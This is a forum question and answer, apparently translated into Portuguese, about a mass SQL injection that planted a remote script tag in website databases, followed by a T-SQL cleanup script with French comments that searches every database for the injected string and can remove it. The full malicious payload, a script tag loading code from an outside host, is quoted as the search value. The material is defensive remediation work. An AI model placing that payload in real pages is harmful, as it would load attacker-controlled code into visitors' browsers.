Decifrando este ataque XSS [fechado]
Alguém sabia mais informações sobre esse ataque?
Recentemente, este script foi injetado em meus sites
By the way não vá neste site, pois é a fonte da infecção
</title><script src=http://google-stats50.**fo/***.php>
Que tipo de ataque é SQL ou CODE?
By the way não vá neste site, pois é a fonte da infecção
A questão é: qual o tipo de ataque que esse ataque infeccioso ocorre?
Nós o encontramos, e não era como o ataque do twitter, era por solicitação de parâmetros em um URL e injetar sql diretamente no parâmetro
Existe o script SQL produzido por nossa equipe sql para limpar seu banco de dados que foi infectado
/*************************************************************************
SQL INJECTED DATABASE
*************************************************************************/
DECLARE @dbName VARCHAR(200),
@SqlString NVARCHAR(MAX),
@SearchText VARCHAR(MAX),
@SearchTextLike VARCHAR(MAX),
@NbItems INT,
@TableName VARCHAR(255),
@ColoneName VARCHAR(255),
@objId BIGINT,
@tmpSqlString NVARCHAR(MAX),
@CleanUp BIT,
@RowCount BIGINT,
@debug BIT,
@Msg VARCHAR(MAX);
SET @debug = 0; -- 1 = Additionnal prints
SET @CleanUp = 0; -- 1 = Update tables
SET @SearchText = '</title><script src=http://google-stats50.info/ur.php></script>';
SET @SearchTextLike = '%' + @SearchText + '%';
DECLARE @QueryResults TABLE (SqlString VARCHAR(MAX), TableName VARCHAR(255), ColoneName VARCHAR(255));
DECLARE @InfectedDB TABLE (InfectedDbName VARCHAR(255));
DECLARE @CleanedUpDB TABLE (DbName VARCHAR(255), Msg VARCHAR(MAX));
DECLARE @DbToValidate TABLE (DbName VARCHAR(255));
INSERT INTO @DbToValidate
SELECT Name
FROM sys.databases
WHERE [state] = 0 AND
Name NOT IN ('master', 'tempdb', 'model', 'msdb') AND
Name NOT LIKE 'sys%'
ORDER BY Name;
DECLARE db_cusor CURSOR FOR
SELECT DbName
FROM @DbToValidate;
OPEN db_cusor;
FETCH NEXT FROM db_cusor
INTO @dbName;
WHILE @@FETCH_STATUS = 0
BEGIN
SET @Msg = 'Traitement pour : ' + @dbName;
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
IF (SELECT [state] FROM sys.databases WHERE Name = @dbName) = 0
BEGIN
IF @debug = 1 PRINT Char(13) + '1 - Processing Database : ' + @dbName;
--Vider le contenu
DELETE FROM @QueryResults;
IF @debug = 1 PRINT '2 - Vider la table @QueryResults';
IF @CleanUp = 0
BEGIN
SET @SqlString = ' USE [' + @dbName + '];' +
' SELECT ''SELECT @NbItems = COUNT(1) FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' +
' FROM sys.tables tbl inner join' +
' sys.columns col on tbl.object_id = col.object_id' +
' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%''';
END
ELSE
BEGIN
SET @SqlString = ' USE [' + @dbName + '];' +
' SELECT ''UPDATE ['' + tbl.Name + ''] SET ['' + col.name + ''] = REPLACE(CAST(['' + col.name + ''] AS VARCHAR(MAX)),''''' + @SearchText + ''''','''''''') FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' +
' FROM sys.tables tbl inner join' +
' sys.columns col on tbl.object_id = col.object_id' +
' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%'''
END
INSERT INTO @QueryResults
EXEC sp_executesql @SqlString;
--Validation pour les erreurs
IF @@ERROR <> 0
BEGIN
GOTO NEXTPRINC
END
IF @debug = 1 PRINT '3 - Récupérer les Query String';
--Faire une loop sur les querys string pour voir s'il y a des injections SQL
DECLARE query_cursor CURSOR FOR
SELECT SqlString, TableName, ColoneName
FROM @QueryResults;
OPEN query_cursor;
FETCH NEXT FROM query_cursor
INTO @SqlString, @TableName, @ColoneName;
IF @debug = 1 PRINT '4 - Cursor sur les Query String';
WHILE @@FETCH_STATUS = 0
BEGIN
SET @tmpSqlString = 'USE [' + @dbName + '];' + 'SELECT @objId = OBJECT_ID(''' + @TableName + ''');'
EXEC sp_executesql @tmpSqlString, N'@objId bigint output', @objId output
--Validation pour les erreurs
IF @@ERROR <> 0
BEGIN
GOTO NEXTINNER
END
IF ISNULL(@objId, -1) <> -1
BEGIN
SET @SqlString = 'USE [' + @dbName + '];' + @SqlString;
IF @CleanUp = 0
BEGIN
EXEC sp_executesql @SqlString, N'@NbItems int output', @NbItems output
END
ELSE
BEGIN
EXEC sp_executesql @SqlString
SET @RowCount = @@ROWCOUNT
END
--Validation pour les erreurs
IF @@ERROR <> 0
BEGIN
GOTO NEXTINNER
END
IF @CleanUp = 0
BEGIN
IF ISNULL(@NbItems, 0) <> 0
BEGIN
-- BD Infectée !
INSERT INTO @InfectedDB VALUES (@dbName);
PRINT '**** BD Infectée : ' + @dbName;
SELECT * FROM @InfectedDB;
BREAK;
END
END
ELSE
BEGIN
IF @RowCount <> 0
BEGIN
SET @Msg = '**** Table --> [' + @TableName + '] .::. Colonne --> [' + @ColoneName + '] .::. Nb Rows --> ' + CAST(@RowCount AS VARCHAR(7));
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
END
END
END
NEXTINNER:
-- Get the next query.
FETCH NEXT FROM query_cursor
INTO @SqlString, @TableName, @ColoneName;
END
CLOSE query_cursor;
DEALLOCATE query_cursor;
IF @debug = 1 PRINT '5 - Vider cursor query';
END
ELSE
BEGIN
SET @Msg = '**** La base de données n''est pas ''ONLINE''.';
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
END
SET @Msg = 'Fin traitement pour : ' + @dbName;
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
NEXTPRINC:
-- Get the next database.
FETCH NEXT FROM db_cusor
INTO @dbName;
END
IF @CleanUp = 0
BEGIN
SELECT * FROM @InfectedDB;
END
ELSE
BEGIN
SELECT * FROM @CleanedUpDB;
END
GOTO FIN
FININNER:
CLOSE query_cursor;
DEALLOCATE query_cursor;
FIN:
--Fermeture du cursor
CLOSE db_cusor;
DEALLOCATE db_cusor;